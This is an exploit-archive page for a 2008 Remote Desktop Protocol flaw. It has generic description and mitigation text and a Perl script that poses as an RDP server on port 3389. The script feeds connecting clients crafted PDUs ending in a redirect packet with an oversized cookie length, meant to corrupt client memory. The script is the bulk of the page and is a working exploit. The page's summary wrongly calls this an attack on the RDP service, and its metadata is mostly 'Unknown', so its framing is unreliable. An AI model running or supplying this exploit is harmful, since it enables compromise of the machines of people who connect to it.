Remote Desktop Protocol (RDP) Remote Code Execution Vulnerability

vendor:

Unknown

by:

Unknown

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: Unknown

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: CVE-Unknown

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

Remote Desktop Protocol (RDP) Remote Code Execution Vulnerability

This exploit takes advantage of a vulnerability in the Remote Desktop Protocol (RDP) service, allowing an attacker to execute arbitrary code on a vulnerable system. The exploit uses a specially crafted payload to trigger the vulnerability and gain control of the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest security updates provided by the vendor. Additionally, it is advised to restrict access to the RDP service and use strong passwords for authentication.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=697

use strict;
use IO::Socket;

my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '3389', Listen => 1, Reuse => 1) || die($!);

my $evil = 	"\x03\x00\x01\x47\x02\xf0\x80\x68\x00\x01\x03\xeb\x70\x81\x38" 	.
		"\x01\x00\x10\x00"						. 
		"\xc5\x32"							.
		"\x04\x75"							. # PDU TYPE == 0x4 == PDU_REDIRECT
		"\xb7\xda\xf8\x43"						.
		"\x01\x00\x00\x00"						.
		"\x01\x00\x00\x00"						.
		"\xff\xff\xff\xff"						. # len of g_redirect_cookie
		"\x41" x 64							; # g_redirect_cookie

while(my $c = $sock->accept())
{
	while(<$c>)
	{
		print $c ONE(), TWO(), THREE(), FOUR(), FIVE(), SIX(), SEVEN(), $evil;
	}
}




sub ONE()
{
	"\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00"
}

sub TWO()
{
	"\x03\x00\x01\x49\x02\xf0\x80\x7f\x66\x82\x01".
	"\x3d\x0a\x01\x00\x02\x01\x00\x30\x1a\x02\x01".
	"\x22\x02\x01\x03\x02\x01\x00\x02\x01\x01\x02".
	"\x01\x00\x02\x01\x01\x02\x03\x00\xff\xf8\x02".
	"\x01\x02\x04\x82\x01\x17\x00\x05\x00\x14\x7c".
	"\x00\x01\x2a\x14\x76\x0a\x01\x01\x00\x01\xc0".
	"\x00\x4d\x63\x44\x6e\x81\x00\x01\x0c\x08\x00".
	"\x04\x00\x08\x00\x03\x0c\x0c\x00\xeb\x03\x01".
	"\x00\xec\x03\x00\x00\x02\x0c\xec\x00\x02\x00".
	"\x00\x00\x02\x00\x00\x00\x20\x00\x00\x00\xb8".
	"\x00\x00\x00\x29\x60\xbb\x2f\xc4\x4d\x00\x9e".
	"\x58\x8a\xb4\x85\x35\x6a\x71\xea\xad\xf9\x3d".
	"\x0e\x5e\x8e\x87\x64\x2d\x52\x42\xed\xb2\x91".
	"\x3f\xf9\x01\x00\x00\x00\x01\x00\x00\x00\x01".
	"\x00\x00\x00\x06\x00\x5c\x00\x52\x53\x41\x31".
	"\x48\x00\x00\x00\x00\x02\x00\x00\x3f\x00\x00".
	"\x00\x01\x00\x01\x00\xf9\xa3\x35\xb2\x78\x63".
	"\x8d\x94\x65\x47\x22\x54\x49\x55\xae\x6f\x74".
	"\x69\x73\x6e\xee\x2b\xa5\xd0\x47\xf6\xc0\x89".
	"\x2e\xa0\x54\xf5\x12\x87\x75\xb5\x89\xf7\x83".
	"\x48\xd9\x54\xeb\xde\x20\x73\xd6\xd8\xf3\xee".
	"\x0f\xf7\xc2\xaa\xa4\x79\x0a\x5a\x64\x92\x53".
	"\xc4\x75\xd4\x00\x00\x00\x00\x00\x00\x00\x00".
	"\x08\x00\x48\x00\xf6\x20\x04\x62\x5b\x2f\x04".
	"\xae\x02\x04\x4a\x7e\xcf\x59\x02\x11\xf7\x7f".
	"\xab\x74\x95\xce\x01\x4e\xf6\x14\x50\x0b\xd7".
	"\x54\x8f\xf0\x92\xd5\x0c\x6f\x42\xd8\x21\x98".
	"\x9f\x87\x50\x9a\x33\x6c\xef\x65\x05\x5c\x4a".
	"\x93\x51\xc1\x69\x59\x7c\x3d\xf4\x63\xdc\x53".
	"\x66\x3b\x00\x00\x00\x00\x00\x00\x00\x00"
}

sub THREE()
{
	"\x03\x00\x00\x0b\x02\xf0\x80\x2e\x00\x00\x04"
}

sub FOUR()
{
	"\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xed\x03\xed"
}

sub FIVE()
{
	"\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xeb\x03\xeb"
}

sub SIX()
{
	"\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xec\x03\xec"
}

sub SEVEN()
{
	"\x03\x00\x00\x22\x02\xf0\x80\x68\x00\x01\x03\xeb\x70\x14\x80\x02\x10\x00\xff\x03\x10\x00\x07\x00\x00\x00\x02\x00\x00\x00\x30\x9a\x00\x00"
}

# milw0rm.com [2008-05-11]